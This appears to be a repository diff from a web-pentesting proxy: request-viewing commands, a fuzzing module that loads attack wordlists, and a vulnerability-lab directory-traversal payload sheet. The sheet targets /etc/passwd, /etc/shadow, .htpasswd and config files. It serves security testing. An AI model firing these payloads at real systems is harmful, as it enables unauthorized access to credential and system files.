from urllib.parse import parse_qs, unquote
###################
## Helper functions
def view_full_message(request, headers_only=False, try_ws=False):
def _print_message(mes):
print_str = ''
if not mes.to_server:
print_str += Colors.BLUE
print_str += '< Incoming'
else:
print_str += Colors.GREEN
print_str += '> Outgoing'
print_str += Colors.ENDC
if mes.unmangled:
print_str += ', ' + Colors.UNDERLINE + 'mangled' + Colors.ENDC
t_plus = "??"
if request.time_start:
t_plus = '%.2f' % (mes.timestamp - request.time_start).total_seconds()
print_str += ', binary = %s, T+%ss\n' % (mes.is_binary, t_plus)
print_str += Colors.ENDC
print_str += maybe_hexdump(mes.message).decode()
print_str += '\n'
return print_str
if headers_only:
print(pretty_headers(request))
else:
if try_ws and request.ws_messages:
print_str = ''
print_str += Styles.TABLE_HEADER
print_str += "Websocket session handshake\n"
print_str += Colors.ENDC
print_str += pretty_msg(request)
print_str += '\n'
print_str += Styles.TABLE_HEADER
print_str += "Websocket session \n"
print_str += Colors.ENDC
for wsm in request.ws_messages:
print_str += _print_message(wsm)
if wsm.unmangled:
print_str += Colors.YELLOW
print_str += '-'*10
print_str += Colors.ENDC
print_str += ' vv UNMANGLED vv '
print_str += Colors.YELLOW
print_str += '-'*10
print_str += Colors.ENDC
print_str += '\n'
print_str += _print_message(wsm.unmangled)
print_str += Colors.YELLOW
print_str += '-'*20 + '-'*len(' ^^ UNMANGLED ^^ ')
print_str += '\n'
print_str += Colors.ENDC
print(print_str)
else:
print(pretty_msg(request))
def print_request_extended(client, request):
# Prints extended info for the request
title = "Request Info (reqid=%s)" % client.get_reqid(request)
print(Styles.TABLE_HEADER + title + Colors.ENDC)
reqlen = len(request.body)
reqlen = '%d bytes' % reqlen
rsplen = 'No response'
mangle_str = 'Nothing mangled'
if request.unmangled:
mangle_str = 'Request'
if request.response:
response_code = str(request.response.status_code) + \
' ' + request.response.reason
response_code = scode_color(response_code) + response_code + Colors.ENDC
rsplen = request.response.content_length
rsplen = '%d bytes' % rsplen
if request.response.unmangled:
if mangle_str == 'Nothing mangled':
mangle_str = 'Response'
else:
mangle_str += ' and Response'
else:
response_code = ''
time_str = '--'
if request.time_end is not None and request.time_start is not None:
time_delt = request.time_end - request.time_start
time_str = "%.2f sec" % time_delt.total_seconds()
if request.use_tls:
is_ssl = 'YES'
else:
is_ssl = Colors.RED + 'NO' + Colors.ENDC
if request.time_start:
time_made_str = datetime_string(request.time_start)
else:
time_made_str = '--'
verb = verb_color(request.method) + request.method + Colors.ENDC
host = color_string(request.dest_host)
colored_tags = [color_string(t) for t in request.tags]
print_pairs = []
print_pairs.append(('Made on', time_made_str))
print_pairs.append(('ID', client.get_reqid(request)))
print_pairs.append(('URL', url_formatter(request, colored=True)))
print_pairs.append(('Host', host))
print_pairs.append(('Path', path_formatter(request.url.path)))
print_pairs.append(('Verb', verb))
print_pairs.append(('Status Code', response_code))
print_pairs.append(('Request Length', reqlen))
print_pairs.append(('Response Length', rsplen))
if request.response and request.response.unmangled:
print_pairs.append(('Unmangled Response Length', request.response.unmangled.content_length))
print_pairs.append(('Time', time_str))
print_pairs.append(('Port', request.dest_port))
print_pairs.append(('SSL', is_ssl))
print_pairs.append(('Mangled', mangle_str))
print_pairs.append(('Tags', ', '.join(colored_tags)))
for k, v in print_pairs:
print(Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v))
def pretty_print_body(fmt, body):
try:
bstr = body.decode()
if fmt.lower() == 'json':
d = json.loads(bstr.strip())
s = json.dumps(d, indent=4, sort_keys=True)
print(pygments.highlight(s, JsonLexer(), TerminalFormatter()))
elif fmt.lower() == 'form':
qs = parse_qs(bstr, keep_blank_values=True)
for k, vs in qs.items():
for v in vs:
s = Colors.GREEN
s += '%s: ' % unquote(k)
s += Colors.ENDC
if v == '':
s += Colors.RED
s += 'EMPTY'
s += Colors.ENDC
else:
s += unquote(v)
print(s)
elif fmt.lower() == 'text':
print(bstr)
elif fmt.lower() == 'xml':
import xml.dom.minidom
# avoid shadowing the xml module with the parsed document
dom = xml.dom.minidom.parseString(bstr)
print(pygments.highlight(dom.toprettyxml(), XmlLexer(), TerminalFormatter()))
else:
raise CommandError('"%s" is not a valid format' % fmt)
except CommandError as e:
raise e
except Exception as e:
raise CommandError('Body could not be parsed as "{}": {}'.format(fmt, e))
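# Example: the 'form' branch above prints url-encoded bodies key by key and
# flags blank values, e.g.
#
#   pretty_print_body('form', b'user=alice&token=')
#   user: alice
#   token: EMPTY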
def print_params(client, req, params=None):
if not req.url.parameters() and not req.body:
print('Request %s has no url or data parameters' % client.get_reqid(req))
print('')
if req.url.parameters():
print(Styles.TABLE_HEADER + "Url Params" + Colors.ENDC)
for k, v in req.url.param_iter():
if params is None or (params and k in params):
print(Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v))
print('')
if req.body:
print(Styles.TABLE_HEADER + "Body/POST Params" + Colors.ENDC)
pretty_print_body(guess_pretty_print_fmt(req), req.body)
print('')
if 'cookie' in req.headers:
print(Styles.TABLE_HEADER + "Cookies" + Colors.ENDC)
for k, v in req.cookie_iter():
if params is None or (params and k in params):
print(Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v))
print('')
# multiform request when we support it
def guess_pretty_print_fmt(msg):
if 'content-type' in msg.headers:
if 'json' in msg.headers.get('content-type'):
return 'json'
elif 'www-form' in msg.headers.get('content-type'):
return 'form'
elif 'application/xml' in msg.headers.get('content-type'):
return 'xml'
return 'text'
def print_tree(tree):
# Prints a tree. Takes in a sorted list of path tuples
_print_tree_helper(tree, 0, [])
def _get_tree_prefix(depth, print_bars, last):
if depth == 0:
return u''
else:
ret = u''
pb = print_bars + [True]
for i in range(depth):
if pb[i]:
ret += u'\u2502 '
else:
ret += u' '
if last:
ret += u'\u2514\u2500 '
else:
ret += u'\u251c\u2500 '
return ret
def _print_tree_helper(tree, depth, print_bars):
# Takes in a tree and prints it at the given depth
if tree == [] or tree == [()]:
return
while tree[0] == ():
tree = tree[1:]
if tree == [] or tree == [()]:
return
if len(tree) == 1 and len(tree[0]) == 1:
print(_get_tree_prefix(depth, print_bars + [False], True) + tree[0][0])
return
curkey = tree[0][0]
subtree = []
for row in tree:
if row[0] != curkey:
if curkey == '':
curkey = '/'
print(_get_tree_prefix(depth, print_bars, False) + curkey)
if depth == 0:
_print_tree_helper(subtree, depth+1, print_bars + [False])
else:
_print_tree_helper(subtree, depth+1, print_bars + [True])
curkey = row[0]
subtree = []
subtree.append(row[1:])
if curkey == '':
curkey = '/'
print(_get_tree_prefix(depth, print_bars, True) + curkey)
_print_tree_helper(subtree, depth+1, print_bars + [False])
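# Example: three in-context paths render as a small tree (output shown
# approximately; the exact prefixes come from _get_tree_prefix):
#
#   print_tree(sorted({('', 'api', 'items'), ('', 'api', 'users'), ('', 'static')}))
#   /
#   ├─ api
#   │   ├─ items
#   │   └─ users
#   └─ static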
def add_param(found_params, kind: str, k: str, v: str, reqid: str):
if type(k) is not str:
raise Exception("BAD")
if not k in found_params:
found_params[k] = {}
if kind in found_params[k]:
found_params[k][kind].append((reqid, v))
else:
found_params[k][kind] = [(reqid, v)]
def print_param_info(param_info):
for k, d in param_info.items():
print(Styles.TABLE_HEADER + k + Colors.ENDC)
for param_type, valpairs in d.items():
print(param_type)
value_ids = {}
for reqid, val in valpairs:
ids = value_ids.get(val, [])
ids.append(reqid)
value_ids[val] = ids
for val, ids in value_ids.items():
if len(ids) <= 15:
idstr = ', '.join(ids)
else:
idstr = ', '.join(ids[:15]) + '...'
if val == '':
printstr = (Colors.RED + 'BLANK' + Colors.ENDC + 'x%d (%s)') % (len(ids), idstr)
else:
printstr = (Colors.GREEN + '%s' + Colors.ENDC + 'x%d (%s)') % (val, len(ids), idstr)
print(printstr)
print('')
def path_tuple(url):
return tuple(url.path.split('/'))
####################
## Command functions
def list_reqs(client, args):
"""
List the most recent in-context requests. By default shows the most recent 25
Usage: list [a|num]
If `a` is given, all the in-context requests are shown. If a number is given,
that many requests will be shown.
"""
if len(args) > 0:
if args[0][0].lower() == 'a':
print_count = 0
else:
try:
print_count = int(args[0])
except:
print("Please enter a valid argument for list")
return
else:
print_count = 25
rows = []
reqs = client.in_context_requests(headers_only=True, max_results=print_count)
for req in reqs:
rows.append(get_req_data_row(req, client=client))
print_request_rows(rows)
def view_full_request(client, args):
"""
View the full data of the request
Usage: view_full_request <reqid(s)>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
view_full_message(req, try_ws=True)
def view_full_response(client, args):
"""
View the full data of the response associated with a request
Usage: view_full_response <reqid>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
if not req.response:
print("-- Request {} does not have an associated response".format(reqid))
else:
print('-- Request id=%s --------------------' % req.db_id)
view_full_message(req.response)
def view_request_headers(client, args):
"""
View the headers of the request
Usage: view_request_headers <reqid(s)>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0], headers_only=True)
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
view_full_message(req, headers_only=True)
def view_response_headers(client, args):
"""
View the headers of the response associated with a request
Usage: view_response_headers <reqid(s)>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0], headers_only=True)
for req in reqs:
if not req.response:
print("-- Request {} does not have an associated response".format(reqid))
else:
print('-- Request id=%s --------------------' % req.db_id)
view_full_message(req.response, headers_only=True)
def view_request_info(client, args):
"""
View information about request
Usage: view_request_info <reqid(s)>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0], headers_only=True)
for req in reqs:
print_request_extended(client, req)
print('')
def pretty_print_request(client, args):
"""
Print the body of the request pretty printed.
Usage: pretty_print_request <format> <reqid(s)>
"""
if len(args) < 2:
raise CommandError("Usage: pretty_print_request <format> <reqid(s)>")
print_type = args[0]
reqs = load_reqlist(client, args[1])
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
try:
pretty_print_body(print_type, req.body)
except Exception as e:
print(str(e))
def pretty_print_response(client, args):
"""
Print the body of the response pretty printed.
Usage: pretty_print_response <format> <reqid(s)>
"""
if len(args) < 2:
raise CommandError("Usage: pretty_print_request <format> <reqid(s)>")
print_type = args[0]
reqs = load_reqlist(client, args[1])
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
if not req.response:
print("request {} does not have an associated response".format(reqid))
continue
try:
pretty_print_body(print_type, req.response.body)
except Exception as e:
print(str(e))
def print_params_cmd(client, args):
"""
View the parameters of a request
Usage: print_params <reqid(s)> [key 1] [key 2] ...
"""
if not args:
raise CommandError("Request id is required")
if len(args) > 1:
keys = args[1:]
else:
keys = None
reqs = load_reqlist(client, args[0])
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
print_params(client, req, keys)
def get_param_info(client, args):
if len(args) == 0:
raise CommandError("Request ID(s) required")
reqs = load_reqlist(client, args[0])
args = args[1:]
if args and args[0] == 'ct':
contains = True
args = args[1:]
else:
contains = False
if args:
params = tuple(args)
else:
params = None
def check_key(k, params, contains):
if contains:
for p in params:
if p.lower() in k.lower():
return True
else:
if params is None or k in params:
return True
return False
found_params = {}
for req in reqs:
prefixed_id = client.get_reqid(req)
for k, v in req.url.param_iter():
if type(k) is not str:
raise Exception("BAD")
if check_key(k, params, contains):
add_param(found_params, 'Url Parameter', k, v, prefixed_id)
for k, v in req.param_iter():
if check_key(k, params, contains):
add_param(found_params, 'POST Parameter', k, v, prefixed_id)
for k, v in req.cookie_iter():
if check_key(k, params, contains):
add_param(found_params, 'Cookie', k, v, prefixed_id)
print_param_info(found_params)
def find_urls(client, args):
if len(args) > 0:
reqs = load_reqlist(client, args[0])
else:
reqs = client.in_context_requests_iter() # update to take reqlist
url_regexp = rb'((?:http|ftp|https)://(?:[\w_-]+(?:(?:\.[\w_-]+)+))(?:[\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?)'
urls = set()
for req in reqs:
urls |= set(re.findall(url_regexp, req.full_message()))
if req.response:
urls |= set(re.findall(url_regexp, req.response.full_message()))
for url in sorted(urls):
print(url.decode())
def site_map(client, args):
"""
Print the site map. Only includes requests in the current context.
Usage: site_map
"""
if len(args) > 0 and args[0] == 'p':
paths = True
else:
paths = False
all_reqs = client.in_context_requests(headers_only=True)
reqs_by_host = {}
for req in all_reqs:
reqs_by_host.setdefault(req.dest_host, []).append(req)
for host, reqs in reqs_by_host.items():
paths_set = set()
for req in reqs:
if req.response and req.response.status_code != 404:
paths_set.add(path_tuple(req.url))
tree = sorted(list(paths_set))
print(host)
if paths:
for p in tree:
print('/'.join(p))
else:
print_tree(tree)
print("")
def save_request(client, args):
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
if len(args) >= 2:
fname = args[1]
else:
fname = "req_%s" % client.get_reqid(req)
with open(fname, 'wb') as f:
f.write(req.full_message())
print('Request written to {}'.format(fname))
def save_response(client, args):
if not args:
raise CommandError("Request id(s) is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
if req.response:
rsp = req.response
if len(args) >= 2:
fname = args[1]
else:
fname = "rsp_%s" % client.get_reqid(req)
with open(fname, 'wb') as f:
f.write(rsp.full_message())
print('Response written to {}'.format(fname))
else:
print('Request {} does not have a response'.format(req.reqid))
def dump_response(client, args):
"""
Dump the data of the response to a file.
Usage: dump_response <id> <filename>
"""
# dump the data of a response
if not args:
raise CommandError("Request id(s) is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
if req.response:
rsp = req.response
if len(args) >= 2:
fname = args[1]
else:
fname = req.url.path.split('/')[-1]
with open(fname, 'wb') as f:
f.write(rsp.body)
print('Response body written to {}'.format(fname))
else:
print('Request {} does not have a response'.format(req.reqid))
def get_surrounding_lines(s, n, lines):
left = n
right = n
lines_left = 0
lines_right = 0
# move left until we find enough lines or hit the edge
while left > 0 and lines_left < lines:
if s[left] == '\n':
lines_left += 1
left -= 1
# move right until we find enough lines or hit the edge
while right < len(s) and lines_right < lines:
if s[right] == '\n':
lines_right += 1
right += 1
return s[left:right]
def print_search_header(reqid, locstr):
printstr = Styles.TABLE_HEADER
printstr += "Result(s) for request {} ({})".format(reqid, locstr)
printstr += Colors.ENDC
print(printstr)
def highlight_str(s, substr):
highlighted = Colors.BGYELLOW + Colors.BLACK + Colors.BOLD + substr + Colors.ENDC
return s.replace(substr, highlighted)
def search_message(mes, substr, lines, reqid, locstr):
header_printed = False
for m in re.finditer(substr, mes):
if not header_printed:
print_search_header(reqid, locstr)
header_printed = True
n = m.start()
linestr = get_surrounding_lines(mes, n, lines)
linelist = linestr.split('\n')
linestr = '\n'.join(line[:500] for line in linelist)
toprint = highlight_str(linestr, substr)
print(toprint)
print('-'*50)
def search(client, args):
search_str = args[0]
lines = 2
if len(args) > 1:
lines = int(args[1])
for req in client.in_context_requests_iter():
reqid = client.get_reqid(req)
reqheader_printed = False
try:
mes = req.full_message().decode()
search_message(mes, search_str, lines, reqid, "Request")
except UnicodeDecodeError:
pass
if req.response:
try:
mes = req.response.full_message().decode()
search_message(mes, search_str, lines, reqid, "Response")
except UnicodeDecodeError:
pass
wsheader_printed = False
for wsm in req.ws_messages:
try:
mes = wsm.message.decode()
except UnicodeDecodeError:
continue
if search_str in mes:
if not wsheader_printed:
print_search_header(reqid, "Websocket Messages")
wsheader_printed = True
print(highlight_str(mes, search_str))

# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def view_request_bytes(line):
#     """
#     View the raw bytes of the request. Use this if you want to redirect output to a file.
#     Usage: view_request_bytes <reqid(s)>
#     """
#     args = shlex.split(line)
#     if not args:
#         raise CommandError("Request id is required")
#     reqid = args[0]
#     reqs = yield load_reqlist(reqid)
#     for req in reqs:
#         if len(reqs) > 1:
#             print 'Request %s:' % req.reqid
#         print req.full_message
#         if len(reqs) > 1:
#             print '-'*30
#             print ''

# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def view_response_bytes(line):
#     """
#     View the full data of the response associated with a request
#     Usage: view_response_bytes <reqid(s)>
#     """
#     reqs = yield load_reqlist(line)
#     for req in reqs:
#         if req.response:
#             if len(reqs) > 1:
#                 print '-'*15 + (' %s ' % req.reqid) + '-'*15
#             print req.response.full_message
#         else:
#             print "Request %s does not have a response" % req.reqid

###############
## Plugin hooks
def load_cmds(cmd):
    cmd.set_cmds({
        'list': (list_reqs, None),
        'view_full_request': (view_full_request, None),
        'view_full_response': (view_full_response, None),
        'view_request_headers': (view_request_headers, None),
        'view_response_headers': (view_response_headers, None),
        'view_request_info': (view_request_info, None),
        'pretty_print_request': (pretty_print_request, None),
        'pretty_print_response': (pretty_print_response, None),
        'print_params': (print_params_cmd, None),
        'param_info': (get_param_info, None),
        'urls': (find_urls, None),
        'site_map': (site_map, None),
        'dump_response': (dump_response, None),
        'save_request': (save_request, None),
        'save_response': (save_response, None),
        'search': (search, None),
        # 'view_request_bytes': (view_request_bytes, None),
        # 'view_response_bytes': (view_response_bytes, None),
    })
    cmd.add_aliases([
        ('list', 'ls'),
        ('view_full_request', 'vfq'),
        ('view_full_request', 'kjq'),
        ('view_request_headers', 'vhq'),
        ('view_response_headers', 'vhs'),
        ('view_full_response', 'vfs'),
        ('view_full_response', 'kjs'),
        ('view_request_info', 'viq'),
        ('pretty_print_request', 'ppq'),
        ('pretty_print_response', 'pps'),
        ('print_params', 'pprm'),
        ('param_info', 'pri'),
        ('site_map', 'sm'),
        ('save_request', 'savereq'),
        ('save_response', 'saversp'),
        # ('view_request_bytes', 'vbq'),
        # ('view_response_bytes', 'vbs'),
        # ('dump_response', 'dr'),
    ])
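
# A minimal sketch of how another module could hook into the same command
# registry (the 'hello' command and its handler below are hypothetical;
# set_cmds maps each command name to a (handler, completer) tuple, as above):
#
# def hello(client, args):
#     print('hello, {}'.format(args[0] if args else 'world'))
#
# def load_cmds(cmd):
#     cmd.set_cmds({'hello': (hello, None)})
#     cmd.add_aliases([('hello', 'hi')])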

View file

@ -1,60 +0,0 @@
import os
from .pappy import session
def from_file(fname, intro=False):
    # If intro is True, ignores lines until the first blank line, then yields
    # every non-blank line afterwards; otherwise yields every non-blank line
    full_fname = os.path.join(session.config.pappy_dir, 'lists', fname)
    with open(full_fname, 'r') as f:
        d = f.read()
    lines = d.splitlines()
    # Delete until the first blank line
    if intro:
        while lines and lines[0] != '':
            lines = lines[1:]
    # Generate non-blank lines
    for l in lines:
        if l:
            yield l

def fuzz_path_trav():
    """
    Fuzz common values for path traversal.
    """
    for l in from_file('path_traversal.txt', True):
        yield l

def fuzz_sqli():
    """
    Fuzz common values that could cause sql errors
    """
    for l in from_file('fuzzdb/attack/sql-injection/detect/xplatform.fuzz.txt'):
        yield l

def fuzz_xss():
    """
    Fuzz values for finding XSS
    """
    for l in from_file('fuzzdb/attack/xss/xss-rsnake.fuzz.txt'):
        yield l

def common_passwords():
    """
    List common passwords
    """
    for l in from_file('fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'):
        yield l

def common_usernames():
    """
    List common usernames
    """
    for l in from_file('fuzzdb/wordlists-user-passwd/names/namelist.txt'):
        yield l

def fuzz_dirs():
    for l in from_file('fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt'):
        yield l
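
# Illustrative use of the generators above from a macro or script (a minimal
# sketch; the loop body is up to the caller): each generator lazily yields one
# payload per wordlist line, so it can drive a fuzzing loop directly:
#
# for payload in fuzz_path_trav():
#     inject(payload)  # hypothetical helper that substitutes the payload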

View file

@ -1,806 +0,0 @@
Via: http://www.vulnerability-lab.com/resources/documents/587.txt
________ .__ __ ___________ .__
\______ \ |__|______ ____ _____/ |_ ___________ ___.__. \__ ___/___________ ___ __ ___________ ___________ | |
| | \| \_ __ \_/ __ \_/ ___\ __\/ _ \_ __ < | | | | \_ __ \__ \\ \/ // __ \_ __ \/ ___/\__ \ | |
| ` \ || | \/\ ___/\ \___| | ( <_> ) | \/\___ | | | | | \// __ \\ /\ ___/| | \/\___ \ / __ \| |__
/_______ /__||__| \___ >\___ >__| \____/|__| / ____| |____| |__| (____ /\_/ \___ >__| /____ >(____ /____/
\/ \/ \/ \/ \/ \/ \/ \/
Information:
A lot of people have asked us about our directory traversal pentest sheet for use in fuzzers or their own scripts. For
good results, you can use the following list with automated scripts and tools, or for manual pentesting. This
list goes out to all friends, nerds, pentesters & exploiters. Please extend the list and we will update it soon.
Note: This is a technical attack sheet for directory traversal penetration tests.
/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow%00
/etc/passwd
/etc/passwd%00
../etc/passwd
../etc/passwd%00
../../etc/passwd
../../etc/passwd%00
../../../etc/passwd
../../../etc/passwd%00
../../../../etc/passwd
../../../../etc/passwd%00
../../../../../etc/passwd
../../../../../etc/passwd%00
../../../../../../etc/passwd
../../../../../../etc/passwd%00
../../../../../../../etc/passwd
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
db.php
data.php
database.asp
database.js
database.php
dbase.php
admin/access_log
../users.db.php
users.db.php
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php%00
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdw==
m='../../../../../../../../etc/passwd';
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\.....\\\.....\\\.....\\\
=3D "/.." . "%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
2fetc2fmaster.passwd
2fmaster.passwd
etc2fpasswd
etc2fshadow%00
2fetc2fpasswd
2fetc2fpasswd%00
..2fetc2fpasswd
..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
